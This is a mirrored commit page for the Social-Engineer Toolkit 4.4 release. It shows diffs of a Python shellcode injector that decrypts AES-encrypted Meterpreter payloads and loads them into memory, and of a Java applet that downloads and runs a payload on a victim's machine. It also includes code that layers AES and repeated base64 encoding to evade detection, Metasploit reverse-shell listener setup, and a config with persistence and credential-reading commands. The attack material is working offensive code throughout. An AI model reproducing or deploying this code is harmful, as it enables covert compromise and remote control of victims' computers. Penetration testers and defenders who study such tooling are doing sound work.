Mirrors/social-engineer-toolkit
2
0
Fork 0
mirror of https://github.com/trustedsec/social-engineer-toolkit synced 2024-11-27 06:50:18 +00:00
Code Issues Projects Releases Packages Wiki Activity

The Social-Engineer Toolkit 4.4 release code

Browse source
This commit is contained in:
trustedsec 2013-01-23 20:50:35 -05:00
parent a3a69e7abf
commit 86d601d5e6
16 changed files with 569 additions and 232 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

78
config/set_config.py Normal file
View file

@ -0,0 +1,78 @@
#!/usr/bin/python
#######################################################################
## DO NOT MODIFY THIS FILE ##
#######################################################################
# This file is generated by a routine inside SET, for use by SET. #
# #
# Settings should be modified in the set_config file, and then #
# SET updated using the 'Update SET Configuration' menu item in #
# the main menu. This file will be updated with the new settings. #
# #
# set_config.py generated: 2013-01-23 20:49:13.505678 #
# #
#######################################################################
CONFIG_DATE='2013-01-23 20:49:13.505678'
METASPLOIT_PATH="/opt/metasploit/msf3"
METASPLOIT_DATABASE="postgresql"
ENCOUNT=4
AUTO_MIGRATE=False
CUSTOM_EXE="legit.binary"
BACKDOOR_EXECUTION=True
METERPRETER_MULTI_SCRIPT=False
LINUX_METERPRETER_MULTI_SCRIPT=False
METERPRETER_MULTI_COMMANDS="run persistence -r 192.168.1.5 -p 21 -i 300 -X -A;getsystem"
LINUX_METERPRETER_MULTI_COMMANDS="uname;id;cat ~/.ssh/known_hosts"
METASPLOIT_IFRAME_PORT=8080
ETTERCAP=False
ETTERCAP_PATH="/usr/share/ettercap"
ETTERCAP_INTERFACE="eth0"
DSNIFF=False
AUTO_DETECT=False
SENDMAIL=False
EMAIL_PROVIDER="GMAIL"
WEBATTACK_EMAIL=False
TIME_DELAY_EMAIL="1"
MLITM_PORT=80
APACHE_SERVER=False
APACHE_DIRECTORY="/var/www"
WEB_PORT=80
SELF_SIGNED_APPLET=False
JAVA_ID_PARAM="Trusted Java Applet (VERIFIED SAFE)"
JAVA_REPEATER=False
JAVA_TIME="200"
WEBATTACK_SSL=False
SELF_SIGNED_CERT=False
PEM_CLIENT="/root/newcert.pem"
PEM_SERVER="/root/newreq.pem"
WEBJACKING_TIME=2000
COMMAND_CENTER_INTERFACE="127.0.0.1"
COMMAND_CENTER_PORT=44444
SET_INTERACTIVE_SHELL=True
TERMINAL="SOLO"
DIGITAL_SIGNATURE_STEAL=True
UPX_ENCODE=True
UPX_PATH="/usr/bin/upx"
AUTO_REDIRECT=True
HARVESTER_REDIRECT=False
HARVESTER_URL="http://thishasnotbeenset"
UNC_EMBED=False
ACCESS_POINT_SSID="linksys"
AIRBASE_NG_PATH="/usr/local/sbin/airbase-ng"
DNSSPOOF_PATH="/usr/local/sbin/dnsspoof"
AP_CHANNEL=9
POWERSHELL_INJECTION=True
POWERSHELL_INJECT_PAYLOAD_X64="windows/x64/meterpreter/reverse_tcp"
POWERSHELL_INJECT_PAYLOAD_X86="windows/meterpreter/reverse_tcp"
POWERSHELL_VERBOSE=False
WEB_PROFILER=False
DEPLOY_OSX_LINUX_PAYLOADS="False"
OSX_REVERSE_PORT=8080
LINUX_REVERSE_PORT=8081
USER_AGENT_STRING="Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)"
SET_SHELL_STAGER=False
AUTOMATIC_LISTENER=True
METASPLOIT_MODE=True
DEPLOY_BINARIES="YES"
CLEANUP_ENABLED_DEBUG="False"
TRACK_EMAIL_ADDRESSES="False"

33
encrypt.py Normal file
View file

@ -0,0 +1,33 @@
from Crypto.Cipher import AES
def EncryptAES(secret, data):
# the character used for padding--with a block cipher such as AES, the value
# you encrypt must be a multiple of BLOCK_SIZE in length. This character is
# used to ensure that your value is always a multiple of BLOCK_SIZE
PADDING = '{'
BLOCK_SIZE = 32
# one-liner to sufficiently pad the text to be encrypted
pad = lambda s: s + (BLOCK_SIZE - len(s) % BLOCK_SIZE) * PADDING
# random value here to randomize builds
a = 50 * 5
# one-liners to encrypt/encode and decrypt/decode a string
# encrypt with AES, encode with base64
EncodeAES = lambda c, s: base64.b64encode(c.encrypt(pad(s)))
DecodeAES = lambda c, e: c.decrypt(base64.b64decode(e)).rstrip(PADDING)
#secret = os.urandom(BLOCK_SIZE)
cipher = AES.new(secret)
aes = EncodeAES(cipher, data)
return aes
secret = os.urandom(32)
fileopen = file("social-engineer-toolkit/src/payloads/set_payloads/multi_pyinjector.binary", "rb")
data = fileopen.read()
encrypted_blob = EncryptAES(secret, data)
filewrite = file("multi_pyinjector.encrypted", "wb")

23
readme/CHANGES
View file

@ -1,3 +1,26 @@
~~~~~~~~~~~~~~~~
version 4.4
~~~~~~~~~~~~~~~
* Added new folder structure under src/webattack/java_applet - this includes again the source code of the Java Applet.
* Added compile program for making applets in the java_applet directory.
* Recompliled the Java Applet to add better obfsucation.
* Edited payloadgen to utilize more base64 encoded techniques.
* Added better stability to the multi injector payload when ports are not found
* Added new core library that called EncryptAES which allows you to encrypt specific string data
* Added obfsucation into the Java Applet and placed new params to pull
* Rewrote multipyinjector for better error handling and performance
* Added AES 256 encryption to the multi-pyinjector - before it would write out the shellcode to tmp files, instead it encrypts the entire data via 256 aes then pulls via command line and does not write out the files
* Added ability for SET and Java Applet to handle multi-pyinjector AES encrypted payloads through the pycrypto modules
* Modified the payload creation to encrypt payloads on the fly with a randomized cipher key exchange - each new payload generated will be a completely different AES cipher key
* Fixed a bug that would cause powershell to not fire properly when using multi-pyinjector. It now prompts for an additional port and appends it to the meta_config_multi_pyinjector answer file for metasploit
* Fixed a bug that would cause pyinjector to not properly execucute when not using powershell injection
* Updated the Java Applet to include the new multi pyinjectir cipher key addition once executed
* New encrypted binary multi pyinjector in place
* Added time delay between firing multiple payloads. When executing multiple instances stdapi.rb freaked out and wouldn't load. This didn't hinder the shell but you would manually need to add the lib in order to get the standard libraries within meterpreter. This has since been fixed.
* Large redesign of multi-pyinjector which is now streamlined to be as effecient as possible
* Added better checking for multi pyinjector when using powershell to add new detections around port.options
~~~~~~~~~~~~~~~~
version 4.3.10
~~~~~~~~~~~~~~~~

6
set
View file

@ -170,9 +170,9 @@ except KeyboardInterrupt:
print "\n\nThank you for " + bcolors.RED+"shopping" + bcolors.ENDC+" with the Social-Engineer Toolkit.\n\nHack the Gibson...and remember...hugs are worth more than handshakes.\n"
# handle exceptions
except Exception, error:
log(error)
print "\n\n[!] Something went wrong, printing the error: "+ str(error)
#except Exception, error:
# log(error)
# print "\n\n[!] Something went wrong, printing the error: "+ str(error)
# cleanup routine
cleanup_routine()

18
src/core/payloadgen/create_payloads.py
View file

@ -494,7 +494,6 @@ try:
print_status("Reverse Shell takes a few seconds to calculate..One moment..")
shellcode = generate_shellcode(choice9, choice2, portnum)
if choice1 == "shellcode/pyinject":
shellcode_port = portnum.replace("LPORT=", "")
@ -509,7 +508,12 @@ try:
multipyinject_payload = multipyinject_payload[:-1]
# if we have multiple payloads, use multi injector
if choice1 == "shellcode/multipyinject":
shellcode = multipyinject_payload
# we first need to encrypt the payload via AES 256
# def encryptAES(secret, data):
print_status("Encrypting the shellcode via 256 AES encryption..")
secret = os.urandom(32)
shellcode = encryptAES(secret, multipyinject_payload)
print_status("Dynamic cipher key created and embedded into payload.")
filewrite = file("%s/src/program_junk/meterpreter.alpha_decoded" % (definepath), "w")
filewrite.write(shellcode)
filewrite.close()
@ -534,8 +538,13 @@ try:
data = base64.b64encode(data)
# again 8
data = base64.b64encode(data)
# ok ok last time
# 9
data = base64.b64encode(data)
# 10
data = base64.b64encode(data)
# last one
data = base64.b64encode(data)
#
filewrite = file("%s/src/program_junk/meterpreter.alpha" % (definepath), "w")
filewrite.write(data)
filewrite.close()
@ -568,6 +577,9 @@ try:
alpha_shellcode = fileopen2.read().rstrip()
data = fileopen.read()
data = data.replace('param name="2" value=""', 'param name="2" value="%s"' % (alpha_shellcode))
if choice1 == "shellcode/multipyinject":
secret = base64.b64encode(secret)
data = data.replace('param name="10" value=""', 'param name="10" value ="%s"' % (secret))
filewrite.write(data)
# close file
filewrite.close()

35
src/core/setcore.py
View file

@ -17,6 +17,7 @@ import string
import inspect
import base64
from src.core import dictionaries
from Crypto.Cipher import AES
# used to grab the true path for current working directory
definepath = os.getcwd()
@ -215,7 +216,7 @@ def print_error(message):
print bcolors.RED + bcolors.BOLD + "[!] " + bcolors.ENDC + bcolors.RED + str(message) + bcolors.ENDC
def get_version():
define_version = '4.3.10'
define_version = '4.4'
return define_version
class create_menu:
@ -834,8 +835,8 @@ def show_banner(define_version,graphic):
print bcolors.BLUE + """
[---] The Social-Engineer Toolkit ("""+bcolors.YELLOW+"""SET"""+bcolors.BLUE+""") [---]
[---] Created by:""" + bcolors.RED+""" David Kennedy """+bcolors.BLUE+"""("""+bcolors.YELLOW+"""ReL1K"""+bcolors.BLUE+""") [---]
[---] Version: """+bcolors.RED+"""%s""" % (define_version) +bcolors.BLUE+""" [---]
[---] Codename: '""" + bcolors.YELLOW + """Turbulence""" + bcolors.BLUE + """' [---]
[---] Version: """+bcolors.RED+"""%s""" % (define_version) +bcolors.BLUE+""" [---]
[---] Codename: '""" + bcolors.YELLOW + """The Goat""" + bcolors.BLUE + """' [---]
[---] Follow us on Twitter: """ + bcolors.PURPLE+ """@trustedsec""" + bcolors.BLUE+""" [---]
[---] Follow me on Twitter: """ + bcolors.PURPLE+ """@dave_rel1k""" + bcolors.BLUE+""" [---]
[---] Homepage: """ + bcolors.YELLOW + """https://www.trustedsec.com""" + bcolors.BLUE+""" [---]
@ -1344,7 +1345,6 @@ def exit_set():
# these are payloads that are callable
def metasploit_shellcode(payload):
counter = 0
if payload == "windows/meterpreter/reverse_tcp":
@ -1365,3 +1365,30 @@ def metasploit_shellcode(payload):
counter = 1
if counter == 0:
return ""
# here we encrypt via aes, will return encrypted string based on secret key which is random
def encryptAES(secret, data):
# the character used for padding--with a block cipher such as AES, the value
# you encrypt must be a multiple of BLOCK_SIZE in length. This character is
# used to ensure that your value is always a multiple of BLOCK_SIZE
PADDING = '{'
BLOCK_SIZE = 32
# one-liner to sufficiently pad the text to be encrypted
pad = lambda s: s + (BLOCK_SIZE - len(s) % BLOCK_SIZE) * PADDING
# random value here to randomize builds
a = 50 * 5
# one-liners to encrypt/encode and decrypt/decode a string
# encrypt with AES, encode with base64
EncodeAES = lambda c, s: base64.b64encode(c.encrypt(pad(s)))
DecodeAES = lambda c, e: c.decrypt(base64.b64decode(e)).rstrip(PADDING)
#secret = os.urandom(BLOCK_SIZE)
cipher = AES.new(secret)
aes = EncodeAES(cipher, data)
return str(aes)

BIN
src/html/Signed_Update.jar.orig
View file

Binary file not shown.

BIN
src/html/msf.exe Normal file
View file

Binary file not shown.

BIN
src/html/unsigned/unsigned.jar
View file

Binary file not shown.

113
src/logs/set_logfile.log
View file

@ -1,113 +0,0 @@
ERROR: 2012-12-12 11:22:41.791385: [Errno 5] Input/output error
ERROR: 2012-12-12 12:28:36.563129: [Errno 5] Input/output error
ERROR: 2012-12-12 16:35:37.579779: invalid syntax (cloner.py, line 266)
ERROR: 2012-12-12 16:37:02.980444: invalid syntax (cloner.py, line 267)
ERROR: 2012-12-12 16:37:54.222136: invalid syntax (harvester.py, line 31)
ERROR: 2012-12-12 16:38:31.807992: 'bool' object has no attribute 'lower'
ERROR: 2012-12-12 21:25:48.866276: invalid syntax (smtp_web.py, line 225)
ERROR: 2012-12-13 20:57:12.055093: invalid syntax (spawn.py, line 472)
ERROR: 2012-12-13 20:57:48.490826: [Errno 5] Input/output error
ERROR: 2012-12-13 21:07:07.837400: name 'web_port' is not defined
ERROR: 2012-12-13 21:07:30.029539: [Errno 5] Input/output error
ERROR: 2012-12-13 21:08:12.267803: name 'web_port' is not defined
ERROR: 2012-12-13 21:08:15.202276: [Errno 5] Input/output error
ERROR: 2012-12-13 21:09:07.510008: name 'web_port' is not defined
ERROR: 2012-12-13 21:09:08.744689: [Errno 5] Input/output error
ERROR: 2012-12-13 21:10:00.582049: name 'web_port' is not defined
ERROR: 2012-12-13 21:10:22.066220: cannot concatenate 'str' and 'datetime.datetime' objects
ERROR: 2012-12-13 21:12:01.132327: name 'web_port' is not defined
ERROR: 2012-12-13 21:12:19.470554: [Errno 5] Input/output error
ERROR: 2012-12-13 21:18:59.546472: name 'web_port' is not defined
ERROR: 2012-12-13 21:19:24.412603: [Errno 5] Input/output error
ERROR: 2012-12-13 21:23:43.224123: name 'web_port' is not defined
ERROR: 2012-12-13 21:23:50.333043: [Errno 5] Input/output error
ERROR: 2012-12-13 21:27:31.529504: name 'web_port' is not defined
ERROR: 2012-12-13 21:29:38.154499: [Errno 5] Input/output error
ERROR: 2012-12-13 22:02:40.790975: name 'web_port' is not defined
ERROR: 2012-12-13 22:02:40.800465: [Errno 98] Address already in use
ERROR: 2012-12-13 22:06:39.624426: name 'web_port' is not defined
ERROR: 2012-12-13 22:06:39.633158: [Errno 98] Address already in use
ERROR: 2012-12-13 22:06:46.897699: [Errno 5] Input/output error
ERROR: 2012-12-13 22:07:39.160490: name 'web_port' is not defined
ERROR: 2012-12-13 22:10:32.951421: [Errno 5] Input/output error
ERROR: 2012-12-13 22:13:28.600808: EOL while scanning string literal (create_payloads.py, line 480)
ERROR: 2012-12-13 22:14:39.979606: name 'web_port' is not defined
ERROR: 2012-12-13 22:16:38.989231: [Errno 5] Input/output error
ERROR: 2012-12-13 22:22:49.945250: name 'web_port' is not defined
ERROR: 2012-12-13 22:25:29.054218: [Errno 5] Input/output error
ERROR: 2012-12-13 22:27:50.504399: name 'web_port' is not defined
ERROR: 2012-12-13 22:32:13.784220: [Errno 5] Input/output error
ERROR: 2012-12-13 22:32:43.383300: name 'web_port' is not defined
ERROR: 2012-12-13 22:33:22.292290: [Errno 5] Input/output error
ERROR: 2012-12-13 22:35:27.075836: name 'web_port' is not defined
ERROR: 2012-12-13 22:36:34.170682: [Errno 5] Input/output error
ERROR: 2012-12-13 22:40:12.579449: name 'web_port' is not defined
ERROR: 2012-12-13 22:41:20.754789: [Errno 5] Input/output error
ERROR: 2012-12-13 22:41:35.620738: name 'web_port' is not defined
ERROR: 2012-12-13 22:42:25.262805: [Errno 5] Input/output error
ERROR: 2012-12-13 22:42:44.974306: name 'web_port' is not defined
ERROR: 2012-12-13 22:43:10.886806: [Errno 5] Input/output error
ERROR: 2012-12-13 22:47:12.170507: name 'web_port' is not defined
ERROR: 2012-12-13 22:47:37.132813: [Errno 5] Input/output error
ERROR: 2012-12-13 22:47:58.511746: name 'web_port' is not defined
ERROR: 2012-12-13 22:49:40.339660: [Errno 5] Input/output error
ERROR: 2012-12-13 22:49:53.850571: name 'web_port' is not defined
ERROR: 2012-12-13 22:50:48.128978: [Errno 5] Input/output error
ERROR: 2012-12-13 22:52:44.280341: name 'web_port' is not defined
ERROR: 2012-12-13 22:53:20.119714: [Errno 5] Input/output error
ERROR: 2012-12-13 22:56:52.827255: name 'web_port' is not defined
ERROR: 2012-12-13 22:57:27.162101: [Errno 5] Input/output error
ERROR: 2012-12-13 23:00:16.118774: name 'web_port' is not defined
ERROR: 2012-12-13 23:00:33.627619: [Errno 5] Input/output error
ERROR: 2012-12-13 23:05:31.936038: name 'web_port' is not defined
ERROR: 2012-12-13 23:05:31.941373: [Errno 98] Address already in use
ERROR: 2012-12-13 23:05:54.322868: name 'web_port' is not defined
ERROR: 2012-12-13 23:06:13.186466: [Errno 5] Input/output error
ERROR: 2012-12-13 23:18:42.330107: name 'web_port' is not defined
ERROR: 2012-12-13 23:19:26.940339: [Errno 5] Input/output error
ERROR: 2012-12-13 23:21:25.910619: name 'web_port' is not defined
ERROR: 2012-12-13 23:22:37.851963: [Errno 5] Input/output error
ERROR: 2012-12-14 22:21:57.260355: name 'web_port' is not defined
ERROR: 2012-12-14 22:23:24.674513: [Errno 5] Input/output error
ERROR: 2012-12-14 22:30:47.772754: name 'web_port' is not defined
ERROR: 2012-12-14 22:32:48.268551: [Errno 5] Input/output error
ERROR: 2012-12-17 09:24:12.950125: name 'web_port' is not defined
ERROR: 2012-12-17 09:25:31.741929: [Errno 5] Input/output error
ERROR: 2012-12-18 16:42:22.260306: name 'web_port' is not defined
ERROR: 2012-12-18 16:44:58.901379: name 'web_port' is not defined
ERROR: 2012-12-19 19:49:49.842477: name 'web_port' is not defined
ERROR: 2012-12-19 19:53:06.614479: [Errno 5] Input/output error
ERROR: 2012-12-19 21:17:42.633949: name 'web_port' is not defined
ERROR: 2012-12-19 21:19:48.873944: [Errno 5] Input/output error
ERROR: 2012-12-19 21:23:30.062258: name 'web_port' is not defined
ERROR: 2012-12-21 08:40:23.535243: name 'web_port' is not defined
ERROR: 2012-12-21 08:51:10.471013: [Errno 2] No such file or directory: 'src/html/Signed_Update.jar.orig'
ERROR: 2012-12-21 08:53:22.207645: name 'web_port' is not defined
ERROR: 2012-12-21 09:01:29.446031: name 'web_port' is not defined
ERROR: 2012-12-21 09:03:17.953215: name 'web_port' is not defined
ERROR: 2012-12-21 09:05:10.293159: name 'web_port' is not defined
ERROR: 2012-12-21 09:05:10.295066: [Errno 98] Address already in use
ERROR: 2012-12-21 15:13:47.810896: name 'web_port' is not defined
ERROR: 2012-12-21 15:16:10.450646: name 'web_port' is not defined
ERROR: 2012-12-21 15:25:43.490438: name 'web_port' is not defined
ERROR: 2012-12-21 15:25:43.496720: [Errno 98] Address already in use
ERROR: 2012-12-21 15:26:04.237449: name 'web_port' is not defined
ERROR: 2012-12-21 15:26:04.246570: [Errno 98] Address already in use
ERROR: 2012-12-21 15:26:08.031538: [Errno 5] Input/output error
ERROR: 2012-12-21 15:26:14.869427: [Errno 5] Input/output error
ERROR: 2012-12-21 15:26:36.229864: name 'web_port' is not defined
ERROR: 2012-12-21 15:34:00.721348: [Errno 5] Input/output error
ERROR: 2012-12-21 15:37:00.760194: name 'web_port' is not defined
ERROR: 2012-12-21 15:37:57.816859: name 'web_port' is not defined
ERROR: 2012-12-21 15:37:57.826239: [Errno 98] Address already in use
ERROR: 2012-12-21 15:39:36.469439: [Errno 5] Input/output error
ERROR: 2012-12-21 15:39:59.002366: name 'web_port' is not defined
ERROR: 2012-12-21 15:40:23.929096: [Errno 5] Input/output error
ERROR: 2012-12-21 15:42:57.839833: name 'web_port' is not defined
ERROR: 2012-12-21 15:43:21.908972: [Errno 5] Input/output error
ERROR: 2012-12-22 13:25:49.074554: name 'web_port' is not defined
ERROR: 2012-12-22 13:26:14.671602: class bcolors has no attribute 'EDNC'
ERROR: 2012-12-22 13:30:17.625793: name 'web_port' is not defined
ERROR: 2012-12-22 13:31:08.153861: [Errno 5] Input/output error
ERROR: 2012-12-30 11:03:39.183398: name 'web_port' is not defined
ERROR: 2012-12-30 11:03:57.931752: [Errno 5] Input/output error

40
src/payloads/powershell/prep.py
View file

@ -15,26 +15,36 @@ else:
filewrite = file("src/program_junk/ipaddr.file", "w")
filewrite.write(ipaddr)
if os.path.isfile("src/program_junk/port.options"):
fileopen = file("src/program_junk/port.options", "r")
port = fileopen.read()
else:
filewrite=file("src/program_junk/port.options", "w")
port = raw_input("Enter the port number for the reverse [443]: ")
if port == "":
port = "443"
filewrite.write(port)
powershell_inject_x64 = check_config("POWERSHELL_INJECT_PAYLOAD_X64=")
powershell_inject_x86 = check_config("POWERSHELL_INJECT_PAYLOAD_X86=")
print_status("Generating x64-based powershell injection code...")
if validate_ip(ipaddr) == False:
powershell_inject_x64 = "windows/meterpreter/reverse_https"
powershell_inject_x86 = "windows/meterpreter/reverse_http"
powershell_inject_x64 = "windows/meterpreter/reverse_https"
powershell_inject_x86 = "windows/meterpreter/reverse_http"
# prompt what port to listen on for powershell then make an append to the current
# metasploit answer file
if os.path.isfile("%s/src/program_junk/meta_config_multipyinjector" % (definepath)):
print_status("POWERSHELL_INJECTION is set to ON with multi-pyinjector")
port=raw_input(setprompt(["4"], "Enter the port for Metasploit to listen on for powershell [443]"))
if port == "": port = "443"
fileopen = file("%s/src/program_junk/meta_config_multipyinjector" % (definepath), "r")
data = fileopen.read()
match = re.search(port, data)
if not match:
filewrite = file("%s/src/program_junk/meta_config_multipyinjector" % (definepath), "a")
filewrite.write("\nuse exploit/multi/handler\nset PAYLOAD %s\nset LHOST 0.0.0.0\nset LPORT %s\nset ExitOnSession false\nexploit -j\n" % (powershell_inject_x86, port))
filewrite.close()
if not os.path.isfile("%s/src/program_junk/meta_config_multipyinjector" % (definepath)):
if os.path.isfile("%s/src/program_junk/port.options" % (definepath)):
fileopen = file("%s/src/program_junk/port.options" % (definepath), "r")
port = fileopen.read()
if not os.path.isfile("%s/src/program_junk/port.options" % (definepath)):
port=raw_input(setprompt(["4"], "Enter the port for Metasploit to listen on for powershell [443]"))
print_status("Generating x64-based powershell injection code...")
x64 = ""
x86 = ""

BIN
src/payloads/set_payloads/multi_pyinjector.binary
View file

Binary file not shown.

170
src/payloads/set_payloads/multi_pyinjector.py Normal file → Executable file
View file

@ -1,121 +1,105 @@
#
# The Social-Engineer Toolkit (SET) Multi-Injector Payload
# For when one is just not enough.
# The Social-Engineer Toolkit Multi-PyInjector revised and simplified version.
# Version: 0.2
#
# This will spawn only a seperate thread per each shellcode instance.
#
# This will add as many payloads as you want to in order
# to inject purely into memory. Hot stuff.
# Written by: Dave Kennedy @ TrustedSec
#
#
# IMPORTANT: YOU NEED TO BYTE COMPILE THIS WITH PYINSTALLER 1.5
# OR PYINSTALLER 2.1 + (dev branch at this time). Known bug when
# calling the same executable within pyinstaller.
# Much cleaner and optimized code. No longer needs files and is passed via
# command line.
#
# Incorporates AES 256 Encryption when passing shellcode
import ctypes
import threading
import sys
import subprocess
import tempfile
from uuid import uuid4
import os
import base64
from Crypto.Cipher import AES
# define our shellcode injection code through ctypes
def inject(shellcode):
shellcode = shellcode.decode("string_escape")
shellcode = bytearray(shellcode)
ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),
ctypes.c_int(len(shellcode)),
ctypes.c_int(0x3000),
ctypes.c_int(0x40))
ctypes.c_int(len(shellcode)),
ctypes.c_int(0x3000),
ctypes.c_int(0x40))
ctypes.windll.kernel32.VirtualLock(ctypes.c_int(ptr),
ctypes.c_int(len(shellcode)))
ctypes.c_int(len(shellcode)))
buf = (ctypes.c_char * len(shellcode)).from_buffer(shellcode)
ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(ptr),
buf,
ctypes.c_int(len(shellcode)))
buf,
ctypes.c_int(len(shellcode)))
ht = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),
ctypes.c_int(0),
ctypes.c_int(ptr),
ctypes.c_int(0),
ctypes.c_int(0),
ctypes.pointer(ctypes.c_int(0)))
ctypes.c_int(0),
ctypes.c_int(ptr),
ctypes.c_int(0),
ctypes.c_int(0),
ctypes.pointer(ctypes.c_int(0)))
ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(ht),ctypes.c_int(-1))
# this grabs the filename we need for our shellcode
try:
# this is the whole file that contains all of our
# shellcode, so for example all 5 would be in this file
shellcode_filename = sys.argv[1]
# this is the name of our exe
executable_filename = sys.argv[2]
except: sys.exit()
# if we are exeucuting seperate processes
execute_shellcode = 0
# this is where we wrote out files in order to execute each in individual processes
# pull the name of file we are executing from
naming = sys.argv[0]
execute_payload = ""
# this will be our ultimate filename we use for the shellcode generate
# by the Social-Engineer Toolkit
try:
process = sys.argv[3]
execute_filename = sys.argv[4]
execute_shellcode = 1
except: pass
if execute_shellcode == 0:
# import in the shellcode
if os.path.isfile(tempfile.gettempdir() + "\\" + shellcode_filename):
fileopen = file(tempfile.gettempdir() + "\\" + shellcode_filename, "r")
shellcode = fileopen.read()
shellcode = shellcode.split(",")
if os.path.isfile(shellcode_filename):
fileopen = file(shellcode_filename, "r")
shellcode = fileopen.read()
# our file containing shellcode
if len(sys.argv[1]) > 1:
payload_filename = sys.argv[1]
if os.path.isfile(payload_filename):
fileopen = file(payload_filename, "r")
shellcode = fileopen.read()
# if we didn't file our shellcode path then exit out
if not os.path.isfile(payload_filename):
sys.exit()
if len(sys.argv[2]) > 1:
# this is our secret key for decrypting the AES encrypted traffic
secret = sys.argv[2]
secret = base64.b64decode(secret)
# the character used for padding--with a block cipher such as AES, the value
# you encrypt must be a multiple of BLOCK_SIZE in length. This character is
# used to ensure that your value is always a multiple of BLOCK_SIZE
PADDING = '{'
BLOCK_SIZE = 32
# one-liner to sufficiently pad the text to be encrypted
pad = lambda s: s + (BLOCK_SIZE - len(s) % BLOCK_SIZE) * PADDING
# one-liners to decrypt a string which will be our shellcode
DecryptAES = lambda c, e: c.decrypt(base64.b64decode(e)).rstrip(PADDING)
cipher = AES.new(secret)
# our decrypted value for shellcode
shellcode = DecryptAES(cipher, shellcode)
# split our shellcode into a list
shellcode = shellcode.split(",")
# This is a hack job way of getting this to work, basically what is happening is when
# calling any shellcode works however if the destination does not allow the port the
# entire application will crash. We need to create completely seperate processes in order
# for it not to crash, so we'll spawn multiple instances of the same instance. Sucks but
# works. With with exitfunc thread/process, etc. ctypes hard crashes within python.
# except an indexerror and allow it to continue forward
except IndexError:
sys.exit()
filename = tempfile.gettempdir() + "\\" + executable_filename # cannot use based on byte compiled python.stack()[-1][1]
temp = executable_filename # inspect.stack()[-1][1]
# see if subprocess graced us with shellcode
try:
execute_payload = sys.argv[3]
except:
pass
random_name = tempfile.gettempdir() + "\\" + str(uuid4())
# grab initial count of how many we have in our array and write out tmp files
counter = 0
if execute_shellcode == 0:
counter = 1
if execute_payload == "":
for payload in shellcode:
filewrite = file(random_name + str(counter) + ".tmp", "w")
filewrite.write(payload)
filewrite.close()
counter = counter + 1
counter2 = 0
for payload in shellcode:
try:
if counter2 != counter:
use_filename = random_name + str(counter2) + ".tmp"
use_counter = 0
if os.path.isfile(filename):
subprocess.Popen(filename + " 1 1 1 %s" % (use_filename), stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)
use_counter = 1
if os.path.isfile(temp):
if use_counter == 0:
if temp.endswith(".py"):
subprocess.Popen("python " + temp + " 1 1 1 %s" % (use_filename), stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)
if temp.endswith(".exe"):
subprocess.Popen(temp + " 1 1 1 %s" % (use_filename), shell=True)
counter2 = counter2 + 1
except: pass
if payload != "":
# seperate process needed in order to work
# meterpreter crashes entire stack via ctypes
# standard threading does not work
subprocess.Popen(naming + " 1 1 " + payload, shell=True)
# if we passed a second argument through subprocess
# execute and inject the shellcode
if execute_payload != "":
inject(execute_payload)
# If we are running in a seperate process through subprocess
# then call the actual shellcode and load it into memory.
if execute_shellcode == 1:
execute_filename = execute_filename
fileopen = file(execute_filename, "r")
shellcode = fileopen.read()
# create the thread to shoot into memory
thread = threading.Thread(target=inject, args=(shellcode,))
# start the thread
thread.start()

248
src/webattack/java_applet/Java.java Normal file
View file

@ -0,0 +1,248 @@
import java.applet.*;
import java.awt.*;
import java.io.*;
import java.net.URL;
import java.util.*;
import sun.misc.BASE64Decoder;
import java.net.URL;
/**
* Original Author: Thomas Werth
* Modifications By: Dave Kennedy, Kevin Mitnick
* This is a universal Applet which determintes Running OS
* Then it fetches based on OS Type download param (WIN,MAC,NIX)
**/
public class Java extends Applet {
private Object initialized = null;
public Object isInitialized()
{
return initialized;
}
public void init() {
Process f;
try {
// generate a random string
Random r = new Random();
String token = Long.toString(Math.abs(r.nextLong()), 36);
String pfad = System.getProperty("java.io.tmpdir") + File.separator;
String writedir = System.getProperty("java.io.tmpdir") + File.separator;
// grab operating system
String os = System.getProperty("os.name").toLowerCase();
// grab jvm architecture
String arch = System.getProperty("os.arch");
String downParm = "";
String nextParm = "";
String thirdParm = "";
String fourthParm = "";
String fifthParm = "";
String sixthParm = "";
String seventhParm = "";
String eightParm = "";
short osType = -1 ;//0=win,1=mac,2=nix
if (os.indexOf( "win" ) >= 0) // We are running Windows then
{
// 1 = WINDOWSPLZ
// 2 = ILIKESTUFF
// 3 = OSX
// 4 = LINUX
// 5 = X64
// 6 = X86
// 7 = HUGSNOTDRUGS
// 8 = LAUNCH
// 9 = nextPage
// 10 = B64EncodeTimes
downParm = getParameter( "1" );
nextParm = getParameter( "2" );
thirdParm = getParameter( "5" );
fourthParm = getParameter( "6" );
fifthParm = getParameter( "7" );
sixthParm = getParameter( "8" );
seventhParm = getParameter( "9" );
eightParm = getParameter( "10" );
osType = 0;
pfad += token + ".exe";
}
else if (os.indexOf( "mac" ) >= 0) //MAC
{
downParm = getParameter( "3" );
osType = 1;
// look for special folders to define snow leopard, etc.
if (pfad.startsWith("/var/folders/")) pfad = "/tmp/";
pfad += token + ".bin";
}
else if (os.indexOf( "nix") >=0 || os.indexOf( "nux") >=0) // UNIX
{
downParm = getParameter( "4" );
osType = 2;
pfad += token + ".bin";
}
if ( downParm.length() > 0 && pfad.length() > 0 )
{
// URL parameter
URL url = new URL(downParm);
// Get an input stream for reading
InputStream in = url.openStream();
// Create a buffered input stream for efficency
BufferedInputStream bufIn = new BufferedInputStream(in);
File outputFile = new File(pfad);
OutputStream out =
new BufferedOutputStream(new FileOutputStream(outputFile));
byte[] buffer = new byte[2048];
for (;;) {
int nBytes = bufIn.read(buffer);
if (nBytes <= 0) break;
out.write(buffer, 0, nBytes);
}
out.flush();
out.close();
in.close();
}
// has it executed yet? then target nextPage to victim
String page = getParameter( "9" );
if ( page != null && page.length() > 0 )
{
URL urlPage = new URL(page);
getAppletContext().showDocument(urlPage);
}
// Here is where we define OS type, i.e. windows, linux, osx, etc.
if ( osType < 1 ) // If we're running Windows
{
File folderExisting = new File("C:\\Windows\\System32\\WindowsPowershell\\v1.0");
if (folderExisting.exists())
{
if (thirdParm.length() > 3)
{
// this detection is for the new powershell vector, it will run a special command if the flag is turned on in SET
if (arch.contains("86") || arch.contains("64"))
{
// this will be 64 bit
